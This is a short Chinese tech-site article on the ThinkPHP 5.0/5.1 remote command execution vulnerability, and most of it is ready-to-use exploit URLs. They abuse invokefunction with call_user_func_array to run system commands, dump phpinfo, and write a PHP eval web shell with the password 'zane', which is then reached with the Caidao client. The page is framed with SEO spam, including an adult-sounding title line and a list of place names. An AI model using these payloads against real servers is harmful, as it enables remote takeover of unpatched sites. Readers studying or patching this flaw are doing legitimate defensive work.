91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

thinkphp_5x_命令執行漏洞的示例分析

發布時間:2021-03-10 09:52:45 來源:億速云 閱讀:161 作者:小新 欄目:編程語言

這篇文章主要介紹thinkphp_5x_命令執行漏洞的示例分析,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!

thinkphp_5x_命令執行漏洞

受影響版本包括5.0和5.1版本

docker漏洞環境源碼:
https://github.com/vulnspy/thinkphp-5.1.29
本地環境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函數遠程命令執行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通過phpinfo函數寫出phpinfo()信息

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

寫入shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>

使用菜刀連接
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php   密碼為zane

http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php        密碼為zane

以上是“thinkphp_5x_命令執行漏洞的示例分析”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

松江区| 宁武县| 孟州市| 遂宁市| 化德县| 东城区| 宁波市| 固安县| 庆阳市| 泸定县| 霍山县| 清流县| 革吉县| 枝江市| 滦南县| 聂拉木县| 哈尔滨市| 融水| 湘潭市| 阿城市| 宾川县| 阿尔山市| 蓬溪县| 天水市| 金坛市| 岱山县| 平顶山市| 冷水江市| 弥勒县| 仁化县| 宁津县| 高安市| 崇仁县| 辛集市| 大厂| 北流市| 开江县| 汕尾市| 锡林浩特市| 南江县| 本溪市|